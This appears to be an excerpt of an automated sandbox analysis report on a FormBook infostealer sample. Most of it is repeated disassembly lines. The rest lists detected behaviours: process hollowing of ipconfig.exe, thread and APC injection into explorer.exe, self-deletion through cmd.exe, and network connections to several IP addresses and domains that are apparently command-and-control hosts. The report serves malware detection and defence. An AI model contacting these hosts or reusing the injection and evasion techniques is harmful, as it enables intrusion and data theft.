          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_0366B260 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_03688A62 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_035B9240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_035B9240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_035B9240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_035B9240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_035C7E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_035C7E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_035C7E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_035C7E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_035C7E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_035C7E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_035F927A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_035DAE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_035DAE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_035DAE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_035DAE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_035DAE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_035C766D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_03644257 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_035D3A1C mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_035EA61C mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_035EA61C mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_035B5210 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_035B5210 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_035B5210 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_035B5210 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_035BAA16 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_035BAA16 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_035C8A0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_0366FE3F mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_035BC600 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_035BC600 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_035BC600 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_035E8E00 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_03671608 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_035F4A2C mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_035F4A2C mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_035BE620 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_035E36CC mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_035E2ACB mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_035F8EC7 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_0366FEC0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_035E2AE4 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_035E16E0 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_03688ED6 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_035C76E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_036346A7 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_035ED294 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_035ED294 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_03680EA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_03680EA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_03680EA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_0364FE87 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_035CAAB0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_035CAAB0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_035EFAB0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_035B52A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_035B52A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_035B52A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_035B52A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_035B52A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_035D7D50 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_035DB944 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_035DB944 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_035F3D43 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_03633540 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_035BB171 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_035BB171 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_035DC577 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_035DC577 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_035BC962 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_0363A537 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_035B9100 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_035B9100 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_035B9100 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_03688D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_035E513A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_035E513A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_035E4D3B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_035E4D3B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_035E4D3B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_035C3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_035C3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_035C3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_035C3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_035C3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_035C3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_035C3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_035C3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_035C3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_035C3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_035C3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_035C3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_035C3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_035BAD30 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_035D4120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_035D4120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_035D4120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_035D4120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_035D4120 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_036441E8 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_03668DF1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_03636DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_03636DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_03636DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_03636DC9 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_03636DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_03636DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_035BB1E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_035BB1E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_035BB1E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_035CD5E0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_035CD5E0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_036805AC mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_036805AC mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_035EFD9B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_035EFD9B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_036369A6 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_035E2990 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_035B2D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_035B2D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_035B2D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_035B2D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_035B2D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_035EA185 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_036351BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_036351BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_036351BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_036351BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_035DC182 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_035E2581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_035E2581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_035E2581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_035E2581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_035E1DB5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_035E1DB5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_035E1DB5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_035E61A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_035E61A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_035E35A1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_035D0050 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_035D0050 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_03672073 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_035EA44B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_03681074 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_035D746D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_0364C450 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_0364C450 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_03671C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_03671C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_03671C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_03671C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_03671C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_03671C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_03671C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_03671C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_03671C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_03671C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_03671C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_03671C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_03671C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_03671C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_0368740D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_0368740D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_0368740D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_03636C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_03636C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_03636C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_03636C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_035EBC2C mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_035E002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_035E002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_035E002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_035E002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_035E002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_03637016 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_03637016 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_03637016 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_035CB02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_035CB02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_035CB02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_035CB02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_03684015 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_03684015 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_03636CF0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_03636CF0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_03636CF0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_036714FB mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_0364B8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_0364B8D0 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_0364B8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_0364B8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_0364B8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_0364B8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_035B58EC mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_03688CD6 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_035C849B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_035B9080 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_035EF0BF mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_035EF0BF mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_035EF0BF mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_03633884 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_03633884 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_035F90AF mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_035E20A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_035E20A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_035E20A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_035E20A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_035E20A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_035E20A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\v8kZUFgdD4.exeProcess token adjusted: Debug
          Source: C:\Windows\SysWOW64\ipconfig.exeProcess token adjusted: Debug

          HIPS / PFW / Operating System Protection Evasion:

          barindex
          System process connects to network (likely due to code injection or exploit)Show sources
          Source: C:\Windows\explorer.exeNetwork Connect: 52.58.78.16 80
          Source: C:\Windows\explorer.exeNetwork Connect: 62.149.128.40 80
          Source: C:\Windows\explorer.exeDomain query: www.oikoschain.com
          Source: C:\Windows\explorer.exeDomain query: www.aizaibali.com
          Source: C:\Windows\explorer.exeDomain query: www.xn--vuq722jwngjre.com
          Source: C:\Windows\explorer.exeDomain query: www.extinctionbrews.com
          Source: C:\Windows\explorer.exeNetwork Connect: 119.59.120.26 80
          Source: C:\Windows\explorer.exeDomain query: www.doityourselfism.com
          Source: C:\Windows\explorer.exeDomain query: www.findfoodshop.com
          Source: C:\Windows\explorer.exeDomain query: www.invisiongc.net
          Source: C:\Windows\explorer.exeNetwork Connect: 162.241.62.54 80
          Source: C:\Windows\explorer.exeNetwork Connect: 169.62.77.158 80
          Source: C:\Windows\explorer.exeNetwork Connect: 34.102.136.180 80
          Source: C:\Windows\explorer.exeNetwork Connect: 103.138.88.11 80
          Source: C:\Windows\explorer.exeDomain query: www.jorgeporcayo.com
          Source: C:\Windows\explorer.exeNetwork Connect: 154.88.31.204 80
          Source: C:\Windows\explorer.exeDomain query: www.scuolatua.com
          Source: C:\Windows\explorer.exeDomain query: www.okinawarongnho.com
          Source: C:\Windows\explorer.exeDomain query: www.ecofingers.com
          Maps a DLL or memory area into another processShow sources
          Source: C:\Users\user\Desktop\v8kZUFgdD4.exeSection loaded: unknown target: C:\Users\user\Desktop\v8kZUFgdD4.exe protection: execute and read and write
          Source: C:\Users\user\Desktop\v8kZUFgdD4.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
          Source: C:\Users\user\Desktop\v8kZUFgdD4.exeSection loaded: unknown target: C:\Windows\SysWOW64\ipconfig.exe protection: execute and read and write
          Source: C:\Users\user\Desktop\v8kZUFgdD4.exeSection loaded: unknown target: C:\Windows\SysWOW64\ipconfig.exe protection: execute and read and write
          Source: C:\Windows\SysWOW64\ipconfig.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: read write
          Source: C:\Windows\SysWOW64\ipconfig.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
          Modifies the context of a thread in another process (thread injection)Show sources
          Source: C:\Users\user\Desktop\v8kZUFgdD4.exeThread register set: target process: 3440
          Source: C:\Windows\SysWOW64\ipconfig.exeThread register set: target process: 3440
          Queues an APC in another process (thread injection)Show sources
          Source: C:\Users\user\Desktop\v8kZUFgdD4.exeThread APC queued: target process: C:\Windows\explorer.exe
          Sample uses process hollowing techniqueShow sources
          Source: C:\Users\user\Desktop\v8kZUFgdD4.exeSection unmapped: C:\Windows\SysWOW64\ipconfig.exe base address: 13E0000
          Source: C:\Users\user\Desktop\v8kZUFgdD4.exeProcess created: C:\Users\user\Desktop\v8kZUFgdD4.exe 'C:\Users\user\Desktop\v8kZUFgdD4.exe'
          Source: C:\Windows\SysWOW64\ipconfig.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\v8kZUFgdD4.exe'
          Source: explorer.exe, 00000005.00000000.379766787.0000000004F80000.00000004.00000001.sdmp, ipconfig.exe, 00000007.00000002.601794902.0000000005BB0000.00000002.00000001.sdmpBinary or memory string: Shell_TrayWnd
          Source: explorer.exe, 00000005.00000000.343823021.0000000000EE0000.00000002.00000001.sdmp, ipconfig.exe, 00000007.00000002.601794902.0000000005BB0000.00000002.00000001.sdmpBinary or memory string: Progman
          Source: explorer.exe, 00000005.00000000.343823021.0000000000EE0000.00000002.00000001.sdmp, ipconfig.exe, 00000007.00000002.601794902.0000000005BB0000.00000002.00000001.sdmpBinary or memory string: &Program Manager
          Source: explorer.exe, 00000005.00000000.343823021.0000000000EE0000.00000002.00000001.sdmp, ipconfig.exe, 00000007.00000002.601794902.0000000005BB0000.00000002.00000001.sdmpBinary or memory string: Progmanlock
          Source: C:\Users\user\Desktop\v8kZUFgdD4.exeCode function: 0_2_0040205A EntryPoint,GetVersion,GetStartupInfoW,GetModuleHandleA,

          Stealing of Sensitive Information:

          barindex
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 0.2.v8kZUFgdD4.exe.21d0000.2.raw.unpack, type: UNPACKEDPE
